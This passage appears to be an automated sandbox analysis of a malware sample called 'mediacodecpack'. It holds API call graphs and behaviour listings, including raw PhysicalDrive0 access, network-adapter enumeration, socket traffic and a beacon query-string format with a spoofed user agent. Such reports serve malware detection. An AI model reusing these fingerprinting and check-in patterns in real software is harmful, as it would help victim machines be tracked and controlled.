2d02bdf 61586->61598 61592 2d02bb6 61587->61592 61588 2d02be2 WSASetLastError WSARecv 61599 2d0950d 61588->61599 61591 2d0fb20 Mailbox 68 API calls 61589->61591 61591->61592 61592->61583 61593 2d02d22 61602 2d01996 68 API calls __cinit 61593->61602 61595 2d02cbc WSASetLastError select 61596 2d0950d 69 API calls 61595->61596 61596->61598 61597 2d0fb20 68 API calls Mailbox 61597->61598 61598->61588 61598->61592 61598->61593 61598->61595 61598->61597 61600 2d0fb20 Mailbox 68 API calls 61599->61600 61601 2d09519 WSAGetLastError 61600->61601 61601->61598 61602->61592 61603->61491 61612 2d123c9 61604->61612 61607 2d11124 61607->61493 61608 2d1114d ResumeThread 61608->61493 61609 2d11146 CloseHandle 61609->61608 61610->61496 61613 2d123d7 61612->61613 61614 2d123eb 61612->61614 61636 2d14acb 59 API calls __getptd_noexit 61613->61636 61616 2d1762a __calloc_crt 59 API calls 61614->61616 61618 2d123f8 61616->61618 61617 2d123dc 61637 2d13b65 9 API calls __fclose_nolock 61617->61637 61620 2d12449 61618->61620 61631 2d148ca 61618->61631 61621 2d11f84 _free 59 API calls 61620->61621 61623 2d1244f 61621->61623 61628 2d1111b 61623->61628 61638 2d14aaa 59 API calls 3 library calls 61623->61638 61625 2d14951 __initptd 59 API calls 61626 2d1240e CreateThread 61625->61626 61626->61628 61630 2d12441 GetLastError 61626->61630 61655 2d12529 61626->61655 61628->61607 61628->61608 61628->61609 61630->61620 61639 2d148e2 GetLastError 61631->61639 61633 2d148d0 61634 2d12405 61633->61634 61653 2d16ffd 59 API calls 3 library calls 61633->61653 61634->61625 61636->61617 61637->61628 61638->61628 61640 2d17d8b __freeptd TlsGetValue 61639->61640 61641 2d148f7 61640->61641 61642 2d14945 SetLastError 61641->61642 61643 2d1762a __calloc_crt 56 API calls 61641->61643 61642->61633 61644 2d1490a 61643->61644 61644->61642 61654 2d17daa TlsSetValue 61644->61654 61646 2d1491e 61647 2d14924 61646->61647 61648 2d1493c 61646->61648 61649 2d14951 __initptd 56 API calls 61647->61649 61650 2d11f84 _free 56 API calls 61648->61650 61652 2d1492c GetCurrentThreadId 61649->61652 61651 2d14942 61650->61651 61651->61642 61652->61642 61654->61646 61656 2d12532 __threadstartex@4 61655->61656 61657 2d17d8b __freeptd TlsGetValue 61656->61657 61658 2d12538 61657->61658 61659 2d1256b 61658->61659 61660 2d1253f __threadstartex@4 61658->61660 61688 2d1475f 59 API calls 6 library calls 61659->61688 61687 2d17daa TlsSetValue 61660->61687 61663 2d1254e 61664 2d12561 GetCurrentThreadId 61663->61664 61665 2d12554 GetLastError RtlExitUserThread 61663->61665 61667 2d12586 ___crtIsPackagedApp 61664->61667 61665->61664 61666 2d1259a 61677 2d12462 61666->61677 61667->61666 61671 2d124d1 61667->61671 61672 2d12513 RtlDecodePointer 61671->61672 61673 2d124da LoadLibraryExW GetProcAddress 61671->61673 61676 2d12523 61672->61676 61674 2d124fd RtlEncodePointer 61673->61674 61675 2d124fc 61673->61675 61674->61672 61675->61666 61676->61666 61678 2d1246e CallCatchBlock 61677->61678 61679 2d148ca __CreateFrameInfo 59 API calls 61678->61679 61680 2d12473 61679->61680 61689 2d11170 61680->61689 61683 2d12483 61684 2d17954 __XcptFilter 59 API calls 61683->61684 61685 2d12494 61684->61685 61687->61663 61688->61667 61707 2d10620 61689->61707 61692 2d111c0 61729 2d0cdb8 61692->61729 61693 2d111b8 TlsSetValue 61693->61692 61698 2d124a3 61699 2d148e2 __getptd_noexit 59 API calls 61698->61699 61700 2d124ac 61699->61700 61701 2d124c7 RtlExitUserThread 61700->61701 61702 2d124c0 61700->61702 61703 2d124bb 61700->61703 61845 2d14894 59 API calls 2 library calls 61702->61845 61844 2d125a6 LoadLibraryExW GetProcAddress RtlEncodePointer RtlDecodePointer 61703->61844 61706 2d124c6 61706->61701 61709 2d10684 61707->61709 61708 2d10700 61710 2d10716 61708->61710 61712 2d10713 CloseHandle 61708->61712 61709->61708 61711 2d1069c 61709->61711 61715 2d107ac WaitForSingleObject 61709->61715 61724 2d10780 CreateEventA 61709->61724 61727 2d1079e CloseHandle 61709->61727 61754 2d10c20 GetCurrentProcessId 61709->61754 61745 2d131bb 61710->61745 61713 2d106de ResetEvent 61711->61713 61716 2d106b5 OpenEventA 61711->61716 61752 2d10c20 GetCurrentProcessId 61711->61752 61712->61710 61718 2d106e5 61713->61718 61715->61709 61720 2d106d7 61716->61720 61721 2d106cf 61716->61721 61717 2d1072e 61717->61692 61717->61693 61753 2d10860 CreateEventA CloseHandle SetEvent GetCurrentProcessId 61718->61753 61720->61713 61720->61718 61721->61720 61723 2d106d4 CloseHandle 61721->61723 61722 2d106b2 61722->61716 61723->61720 61724->61709 61727->61709 61728 2d106fd 61728->61708 61730 2d0cdda 61729->61730 61756 2d04d86 61730->61756 61731 2d0cddd 61733 2d10f40 61731->61733 61734 2d10f71 Mailbox 61733->61734 61735 2d10f79 TlsGetValue 61733->61735 61736 2d10fed 61734->61736 61738 2d10fc9 61734->61738 61741 2d11059 GetProcessHeap HeapFree 61734->61741 61744 2d1104b GetProcessHeap HeapFree 61734->61744 61735->61734 61737 2d11016 61736->61737 61739 2d1100e GetProcessHeap HeapFree 61736->61739 61737->61698 61740 2d10620 17 API calls 61738->61740 61739->61737 61742 2d10fd8 61740->61742 61741->61734 61742->61736 61743 2d10fe5 TlsSetValue 61742->61743 61743->61736 61744->61741 61746 2d131c3 61745->61746 61747 2d131c5 IsProcessorFeaturePresent 61745->61747 61746->61717 61749 2d1814f 61747->61749 61755 2d180fe 5 API calls 2 library calls 61749->61755 61751 2d18232 61751->61717 61752->61722 61753->61728 61754->61709 61755->61751 61757 2d04d90 __EH_prolog 61756->61757 61758 2d0fb20 Mailbox 68 API calls 61757->61758 61759 2d04da6 RtlEnterCriticalSection RtlLeaveCriticalSection 61758->61759 61760 2d050d4 shared_ptr 61759->61760 61773 2d04dd1 std::bad_exception::bad_exception 61759->61773 61760->61731 61762 2d050a1 RtlEnterCriticalSection RtlLeaveCriticalSection 61763 2d050b3 RtlEnterCriticalSection RtlLeaveCriticalSection 61762->61763 61763->61760 61763->61773 61764 2d09729 73 API calls 61764->61773 61766 2d04e8d RtlEnterCriticalSection RtlLeaveCriticalSection 61767 2d04e9f RtlEnterCriticalSection RtlLeaveCriticalSection 61766->61767 61767->61773 61768 2d0bedd 73 API calls 61768->61773 61773->61762 61773->61763 61773->61764 61773->61766 61773->61767 61773->61768 61776 2d04bed 61773->61776 61800 2d06d28 60 API calls 61773->61800 61801 2d0c00f 60 API calls 2 library calls 61773->61801 61802 2d06d02 60 API calls std::bad_exception::bad_exception 61773->61802 61803 2d099b6 60 API calls 2 library calls 61773->61803 61804 2d09a8e 210 API calls 3 library calls 61773->61804 61805 2d10900 GetProcessHeap HeapFree 61773->61805 61806 2d04100 GetProcessHeap HeapFree 61773->61806 61777 2d04bf7 __EH_prolog 61776->61777 61778 2d01ba7 209 API calls 61777->61778 61779 2d04c31 61778->61779 61807 2d03a94 61779->61807 61781 2d04c3c 61782 2d03a94 60 API calls 61781->61782 61783 2d04c56 61782->61783 61810 2d075d6 61783->61810 61788 2d0fb20 Mailbox 68 API calls 61789 2d04cb8 61788->61789 61835 2d0b294 61789->61835 61791 2d04ce1 InterlockedExchange 61839 2d02995 95 API calls Mailbox 61791->61839 61793 2d04d3c 61843 2d0761f 75 API calls 2 library calls 61793->61843 61798 2d04d57 shared_ptr 61798->61773 61799 2d04d06 61799->61793 61840 2d07592 76 API calls Mailbox 61799->61840 61841 2d072fc 82 API calls Mailbox 61799->61841 61842 2d02995 95 API calls Mailbox 61799->61842 61800->61773 61801->61773 61802->61773 61803->61773 61804->61773 61805->61773 61806->61773 61808 2d039ee 60 API calls 61807->61808 61809 2d03ab5 61808->61809 61809->61781 61811 2d0fb20 Mailbox 68 API calls 61810->61811 61812 2d075ec 61811->61812 61813 2d08a25 77 API calls 61812->61813 61814 2d07606 61813->61814 61815 2d01712 60 API calls 61814->61815 61816 2d04c8b 61815->61816 61817 2d0d0fc 61816->61817 61818 2d0d106 __EH_prolog 61817->61818 61819 2d01a01 61 API calls 61818->61819 61820 2d0d11d 61819->61820 61822 2d0fb20 Mailbox 68 API calls 61820->61822 61823 2d0d15a InterlockedExchangeAdd 61820->61823 61822->61823 61824 2d0d195 RtlEnterCriticalSection 61823->61824 61825 2d0d18a 61823->61825 61827 2d06f5f 60 API calls 61824->61827 61826 2d01ec7 InterlockedIncrement PostQueuedCompletionStatus RtlEnterCriticalSection InterlockedExchange RtlLeaveCriticalSection 61825->61826 61828 2d0d193 61826->61828 61829 2d0d1bb InterlockedIncrement 61827->61829 61833 2d0d856 TlsGetValue 61828->61833 61830 2d0d1d2 RtlLeaveCriticalSection 61829->61830 61831 2d0d1cb 61829->61831 61830->61828 61832 2d027f3 SetWaitableTimer 61831->61832 61832->61830 61834 2d04ca4 61833->61834 61834->61788 61836 2d0b2a7 61835->61836 61837 2d0b2d0 61836->61837 61838 2d0d9c5 83 API calls 61836->61838 61837->61791 61838->61837 61839->61799 61840->61799 61841->61799 61842->61799 61843->61798 61844->61702 61845->61706 61846->61508 61847->61511 61848->61509 61849->61511 61850->61515 61852 2d0d33e __EH_prolog 61851->61852 61853 2d127c5 _Allocate 60 API calls 61852->61853 61854 2d0d347 61853->61854 61855 2d01bfa RtlEnterCriticalSection 61854->61855 61857 2d0d555 61854->61857 61855->61520 61858 2d0d55f __EH_prolog 61857->61858 61861 2d026db RtlEnterCriticalSection 61858->61861 61860 2d0d5b5 61860->61855 61862 2d02728 CreateWaitableTimerA 61861->61862 61863 2d0277e 61861->61863 61864 2d02738 GetLastError 61862->61864 61865 2d0275b SetWaitableTimer 61862->61865 61866 2d027d5 RtlLeaveCriticalSection 61863->61866 61868 2d127c5 _Allocate 60 API calls 61863->61868 61867 2d0fb20 Mailbox 68 API calls 61864->61867 61865->61863 61866->61860 61869 2d02745 61867->61869 61870 2d0278a 61868->61870 61905 2d01712 61869->61905 61872 2d127c5 _Allocate 60 API calls 61870->61872 61873 2d027c8 61870->61873 61874 2d027a9 61872->61874 61911 2d06e07 CloseHandle 61873->61911 61877 2d01cf8 CreateEventA 61874->61877 61878 2d01d52 CreateEventA 61877->61878 61879 2d01d23 GetLastError 61877->61879 61880 2d01d6b GetLastError 61878->61880 61897 2d01d96 61878->61897 61882 2d01d33 61879->61882 61883 2d01d7b 61880->61883 61881 2d123c9 __beginthreadex 201 API calls 61884 2d01db6 61881->61884 61885 2d0fb20 Mailbox 68 API calls 61882->61885 61886 2d0fb20 Mailbox 68 API calls 61883->61886 61887 2d01dc6 GetLastError 61884->61887 61888 2d01e0d 61884->61888 61889 2d01d3c 61885->61889 61890 2d01d84 61886->61890 61895 2d01dd8 61887->61895 61891 2d01e11 WaitForSingleObject CloseHandle 61888->61891 61892 2d01e1d 61888->61892 61893 2d01712 60 API calls 61889->61893 61894 2d01712 60 API calls 61890->61894 61891->61892 61892->61873 61896 2d01d4e 61893->61896 61894->61897 61898 2d01ddc CloseHandle 61895->61898 61899 2d01ddf 61895->61899 61896->61878 61897->61881 61898->61899 61900 2d01de9 CloseHandle 61899->61900 61901 2d01dee 61899->61901 61900->61901 61902 2d0fb20 Mailbox 68 API calls 61901->61902 61903 2d01dfb 61902->61903 61904 2d01712 60 API calls 61903->61904 61904->61888 61906 2d0171c __EH_prolog 61905->61906 61907 2d0173e 61906->61907 61912 2d01815 59 API calls std::exception::exception 61906->61912 61907->61865 61909 2d01732 61913 2d094a6 60 API calls 2 library calls 61909->61913 61911->61866 61912->61909 61925 2d030ae WSASetLastError 61914->61925 61917 2d030ae 71 API calls 61918 2d03c90 61917->61918 61919 2d016ae 61918->61919 61920 2d016b8 __EH_prolog 61919->61920 61921 2d01701 61920->61921 61941 2d114e3 59 API calls std::exception::_Copy_str 61920->61941 61921->61529 61923 2d016dc 61942 2d094a6 60 API calls 2 library calls 61923->61942 61926 2d030ec WSAStringToAddressA 61925->61926 61927 2d030ce 61925->61927 61928 2d0950d 69 API calls 61926->61928 61927->61926 61929 2d030d3 61927->61929 61930 2d03114 61928->61930 61931 2d0fb20 Mailbox 68 API calls 61929->61931 61932 2d03154 61930->61932 61938 2d0311e _memcmp 61930->61938 61940 2d030d8 61931->61940 61933 2d03135 61932->61933 61935 2d0fb20 Mailbox 68 API calls 61932->61935 61934 2d03193 61933->61934 61936 2d0fb20 Mailbox 68 API calls 61933->61936 61939 2d0fb20 Mailbox 68 API calls 61934->61939 61934->61940 61935->61933 61936->61934 61937 2d0fb20 Mailbox 68 API calls 61937->61933 61938->61933 61938->61937 61939->61940 61940->61917 61940->61918 61941->61923 61943->61535 61944->61534 61966 2d0353e 61945->61966 61949 2d02ae8 WSASetLastError connect 61948->61949 61950 2d02ad8 61948->61950 61951 2d0950d 69 API calls 61949->61951 61952 2d0fb20 Mailbox 68 API calls 61950->61952 61954 2d02b07 61951->61954 61953 2d02add 61952->61953 61956 2d0fb20 Mailbox 68 API calls 61953->61956 61954->61953 61955 2d0fb20 Mailbox 68 API calls 61954->61955 61955->61953 61957 2d02b1b 61956->61957 61959 2d0fb20 Mailbox 68 API calls 61957->61959 61961 2d02b38 61957->61961 61959->61961 61960 2d02b59 61962 2d02b87 61960->61962 62000 2d02fb4 71 API calls Mailbox 61960->62000 61961->61962 61999 2d03027 71 API calls Mailbox 61961->61999 61962->61541 61964 2d02b7a 61964->61962 61965 2d0fb20 Mailbox 68 API calls 61964->61965 61965->61962 61967 2d03548 __EH_prolog 61966->61967 61968 2d03576 61967->61968 61969 2d03557 61967->61969 61988 2d02edd WSASetLastError WSASocketA 61968->61988 61996 2d01996 68 API calls __cinit 61969->61996 61973 2d035ad CreateIoCompletionPort 61974 2d035c5 GetLastError 61973->61974 61975 2d035db 61973->61975 61976 2d0fb20 Mailbox 68 API calls 61974->61976 61977 2d0fb20 Mailbox 68 API calls 61975->61977 61978 2d035d2 61976->61978 61977->61978 61979 2d03626 61978->61979 61980 2d035ef 61978->61980 61998 2d0cef7 60 API calls 2 library calls 61979->61998 61981 2d0fb20 Mailbox 68 API calls 61980->61981 61982 2d03608 61981->61982 61997 2d029ee 76 API calls Mailbox 61982->61997 61985 2d03659 61986 2d0fb20 Mailbox 68 API calls 61985->61986 61987 2d0355f 61986->61987 61987->61537 61989 2d0fb20 Mailbox 68 API calls 61988->61989 61990 2d02f0a WSAGetLastError 61989->61990 61991 2d02f21 61990->61991 61992 2d02f41 61990->61992 61993 2d02f27 setsockopt 61991->61993 61994 2d02f3c 61991->61994 61992->61973 61992->61987 61993->61994 61995 2d0fb20 Mailbox 68 API calls 61994->61995 61995->61992 61996->61987 61997->61987 61998->61985 61999->61960 62000->61964 62002 2d02de4 62001->62002 62003 2d02dca 62001->62003 62004 2d02dfc 62002->62004 62006 2d02def 62002->62006 62005 2d0fb20 Mailbox 68 API calls 62003->62005 62015 2d02d39 WSASetLastError WSASend 62004->62015 62009 2d02dcf 62005->62009 62008 2d0fb20 Mailbox 68 API calls 62006->62008 62008->62009 62009->61544 62010 2d02e54 WSASetLastError select 62011 2d0950d 69 API calls 62010->62011 62013 2d02e0c 62011->62013 62012 2d0fb20 68 API calls Mailbox 62012->62013 62013->62009 62013->62010 62013->62012 62014 2d02d39 71 API calls 62013->62014 62014->62013 62016 2d0950d 69 API calls 62015->62016 62017 2d02d6e 62016->62017 62018 2d02d82 62017->62018 62019 2d02d75 62017->62019 62021 2d02d7a 62018->62021 62022 2d0fb20 Mailbox 68 API calls 62018->62022 62020 2d0fb20 Mailbox 68 API calls 62019->62020 62020->62021 62023 2d02d9c 62021->62023 62024 2d0fb20 Mailbox 68 API calls 62021->62024 62022->62021 62023->62013 62024->62023

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • RtlInitializeCriticalSection.NTDLL(02D34FD0), ref: 02D05E92
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D05EA9
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D05EB2
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D05EC1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D05EC4
                                                                                • GetTickCount.KERNEL32 ref: 02D05ED8
                                                                                  • Part of subcall function 02D059FA: _malloc.LIBCMT ref: 02D05A08
                                                                                • GetVersionExA.KERNEL32(02D34E20), ref: 02D05F05
                                                                                • _memset.LIBCMT ref: 02D05F24
                                                                                • _malloc.LIBCMT ref: 02D05F31
                                                                                  • Part of subcall function 02D11FBC: __FF_MSGBANNER.LIBCMT ref: 02D11FD3
                                                                                  • Part of subcall function 02D11FBC: __NMSG_WRITE.LIBCMT ref: 02D11FDA
                                                                                  • Part of subcall function 02D11FBC: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001), ref: 02D11FFF
                                                                                • _malloc.LIBCMT ref: 02D05F41
                                                                                • _malloc.LIBCMT ref: 02D05F4C
                                                                                • _malloc.LIBCMT ref: 02D05F57
                                                                                • _malloc.LIBCMT ref: 02D05F62
                                                                                • _malloc.LIBCMT ref: 02D05F6D
                                                                                • _malloc.LIBCMT ref: 02D05F78
                                                                                • _malloc.LIBCMT ref: 02D05F84
                                                                                • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D05F9B
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D05FA4
                                                                                • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D05FB0
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D05FB3
                                                                                • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D05FBE
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D05FC1
                                                                                • _memset.LIBCMT ref: 02D05FD1
                                                                                • _memset.LIBCMT ref: 02D05FDD
                                                                                • _memset.LIBCMT ref: 02D05FEA
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D05FF8
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D06005
                                                                                • _malloc.LIBCMT ref: 02D06026
                                                                                • _malloc.LIBCMT ref: 02D06034
                                                                                • _malloc.LIBCMT ref: 02D0603B
                                                                                • _malloc.LIBCMT ref: 02D0605C
                                                                                • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D06068
                                                                                • Sleep.KERNELBASE(00000000), ref: 02D06076
                                                                                • _malloc.LIBCMT ref: 02D06082
                                                                                • _malloc.LIBCMT ref: 02D06092
                                                                                • _memset.LIBCMT ref: 02D060A7
                                                                                • _memset.LIBCMT ref: 02D060B7
                                                                                • Sleep.KERNELBASE(0000EA60), ref: 02D06104
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D0610F
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D06120
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _malloc$Heap$_memset$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$Q!V$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                • API String ID: 1856495841-38596970
                                                                                • Opcode ID: cd3d6d413185bfc2559cf95eb840017fb0f034a8840cafe3229b7dd0d631c000
                                                                                • Instruction ID: 3f4add99502ae2c357e21d11ed5e5eb67172ed09936b25c9802766d32623d203
                                                                                • Opcode Fuzzy Hash: cd3d6d413185bfc2559cf95eb840017fb0f034a8840cafe3229b7dd0d631c000
                                                                                • Instruction Fuzzy Hash: 9171B0B2D48340ABE311AB34BC44B5B7BE8EF55314F15091DF68897381DBB88D18CBA6

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 462 2d0e9ab-2d0e9ce LoadLibraryA 463 2d0e9d4-2d0e9e2 GetProcAddress 462->463 464 2d0ea8e-2d0ea95 462->464 465 2d0ea87-2d0ea88 FreeLibrary 463->465 466 2d0e9e8-2d0e9f8 463->466 465->464 467 2d0e9fa-2d0ea06 GetAdaptersInfo 466->467 468 2d0ea08 467->468 469 2d0ea3e-2d0ea46 467->469 470 2d0ea0a-2d0ea11 468->470 471 2d0ea48-2d0ea4e call 2d126df 469->471 472 2d0ea4f-2d0ea54 469->472 476 2d0ea13-2d0ea17 470->476 477 2d0ea1b-2d0ea23 470->477 471->472 474 2d0ea82-2d0ea86 472->474 475 2d0ea56-2d0ea59 472->475 474->465 475->474 479 2d0ea5b-2d0ea60 475->479 476->470 480 2d0ea19 476->480 481 2d0ea26-2d0ea2b 477->481 482 2d0ea62-2d0ea6a 479->482 483 2d0ea6d-2d0ea78 call 2d127c5 479->483 480->469 481->481 484 2d0ea2d-2d0ea3a call 2d0e6fa 481->484 482->483 483->474 489 2d0ea7a-2d0ea7d 483->489 484->469 489->467
                                                                                APIs
                                                                                • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 02D0E9C1
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D0E9DA
                                                                                • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D0E9FF
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 02D0EA88
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                • API String ID: 514930453-3114217049
                                                                                • Opcode ID: 45c82d720d595a180787ea9344a348b92a94567ea30c64cd9009d4faaab84f29
                                                                                • Instruction ID: 1b600af507e52a90fcef6f1882a587a9ebcc0f2cfe00893113599ba6840a1aab
                                                                                • Opcode Fuzzy Hash: 45c82d720d595a180787ea9344a348b92a94567ea30c64cd9009d4faaab84f29
                                                                                • Instruction Fuzzy Hash: 3321E671E082599BDB24DBA9D8C4BEEBBB9FF09314F1444A9E444E7391D7308D45CBA0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 506 2d02b95-2d02baf 507 2d02bb1-2d02bb9 call 2d0fb20 506->507 508 2d02bc7-2d02bcb 506->508 516 2d02bbf-2d02bc2 507->516 510 2d02bcd-2d02bd0 508->510 511 2d02bdf 508->511 510->511 514 2d02bd2-2d02bdd call 2d0fb20 510->514 512 2d02be2-2d02c11 WSASetLastError WSARecv call 2d0950d 511->512 519 2d02c16-2d02c1d 512->519 514->516 520 2d02d30 516->520 521 2d02c2c-2d02c32 519->521 522 2d02c1f-2d02c2a call 2d0fb20 519->522 523 2d02d32-2d02d38 520->523 525 2d02c34-2d02c39 call 2d0fb20 521->525 526 2d02c46-2d02c48 521->526 532 2d02c3f-2d02c42 522->532 525->532 529 2d02c4a-2d02c4d 526->529 530 2d02c4f-2d02c60 call 2d0fb20 526->530 534 2d02c66-2d02c69 529->534 530->523 530->534 532->526 536 2d02c73-2d02c76 534->536 537 2d02c6b-2d02c6d 534->537 536->520 539 2d02c7c-2d02c9a call 2d0fb20 call 2d0166f 536->539 537->536 538 2d02d22-2d02d2d call 2d01996 537->538 538->520 546 2d02cbc-2d02cfa WSASetLastError select call 2d0950d 539->546 547 2d02c9c-2d02cba call 2d0fb20 call 2d0166f 539->547 552 2d02d08 546->552 553 2d02cfc-2d02d06 call 2d0fb20 546->553 547->520 547->546 556 2d02d15-2d02d17 552->556 557 2d02d0a-2d02d12 call 2d0fb20 552->557 561 2d02d19-2d02d1d 553->561 556->520 556->561 557->556 561->512
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D02BE4
                                                                                • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D02C07
                                                                                  • Part of subcall function 02D0950D: WSAGetLastError.WS2_32(00000000,?,?,02D02A51), ref: 02D0951B
                                                                                • WSASetLastError.WS2_32 ref: 02D02CD3
                                                                                • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D02CE7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Recvselect
                                                                                • String ID: 3'
                                                                                • API String ID: 886190287-280543908
                                                                                • Opcode ID: 002e7845789f75ff46b4857c96f2b7a0474eeb3e36d1847952f6fffd39b84fd2
                                                                                • Instruction ID: 112cccace94e91c848df00d70dacf7119489f61d8c295644d7a9147d9af0259e
                                                                                • Opcode Fuzzy Hash: 002e7845789f75ff46b4857c96f2b7a0474eeb3e36d1847952f6fffd39b84fd2
                                                                                • Instruction Fuzzy Hash: 3E413AB19063019FD720AF64D89876ABBE9AF84354F10491EA895877E0EB70DD44CFA1

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 563 2d0e8a7-2d0e8d2 CreateFileA 564 2d0e9a3-2d0e9aa 563->564 565 2d0e8d8-2d0e8ed 563->565 566 2d0e8f0-2d0e912 DeviceIoControl 565->566 567 2d0e914-2d0e91c 566->567 568 2d0e94b-2d0e953 566->568 571 2d0e925-2d0e92a 567->571 572 2d0e91e-2d0e923 567->572 569 2d0e955-2d0e95b call 2d126df 568->569 570 2d0e95c-2d0e95e 568->570 569->570 574 2d0e960-2d0e963 570->574 575 2d0e999-2d0e9a2 CloseHandle 570->575 571->568 576 2d0e92c-2d0e934 571->576 572->568 578 2d0e965-2d0e96e GetLastError 574->578 579 2d0e97f-2d0e98c call 2d127c5 574->579 575->564 580 2d0e937-2d0e93c 576->580 578->575 581 2d0e970-2d0e973 578->581 579->575 587 2d0e98e-2d0e994 579->587 580->580 583 2d0e93e-2d0e94a call 2d0e6fa 580->583 581->579 584 2d0e975-2d0e97c 581->584 583->568 584->579 587->566
                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D0E8C6
                                                                                • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D0E904
                                                                                • GetLastError.KERNEL32 ref: 02D0E965
                                                                                • CloseHandle.KERNELBASE(?), ref: 02D0E99C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                • String ID: \\.\PhysicalDrive0
                                                                                • API String ID: 4026078076-1180397377
                                                                                • Opcode ID: 1da1384dbc2f6579bb8c7bbf8a85bdd6dc78ff93c0091f5a0068a347440a6f20
                                                                                • Instruction ID: f69358f3041359e50ad7c496cf577b9554a6050dd4d1aad8d7ae6f0c5c010f48
                                                                                • Opcode Fuzzy Hash: 1da1384dbc2f6579bb8c7bbf8a85bdd6dc78ff93c0091f5a0068a347440a6f20
                                                                                • Instruction Fuzzy Hash: 2331A571D00225EBDB24CF95E884BAEBB78EF45714F20496EE505A7390D7705E04CBA0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • RtlInitializeCriticalSection.NTDLL(02D34FD0), ref: 02D05E92
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D05EA9
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D05EB2
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D05EC1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D05EC4
                                                                                • GetTickCount.KERNEL32 ref: 02D05ED8
                                                                                • GetVersionExA.KERNEL32(02D34E20), ref: 02D05F05
                                                                                • _memset.LIBCMT ref: 02D05F24
                                                                                • _malloc.LIBCMT ref: 02D05F31
                                                                                • _malloc.LIBCMT ref: 02D05F41
                                                                                • _malloc.LIBCMT ref: 02D05F4C
                                                                                • _malloc.LIBCMT ref: 02D05F57
                                                                                • _malloc.LIBCMT ref: 02D05F62
                                                                                • _malloc.LIBCMT ref: 02D05F6D
                                                                                • _malloc.LIBCMT ref: 02D05F78
                                                                                • _malloc.LIBCMT ref: 02D05F84
                                                                                • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D05F9B
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D05FA4
                                                                                • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D05FB0
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D05FB3
                                                                                • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D05FBE
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D05FC1
                                                                                Strings
                                                                                Memory Dump Source
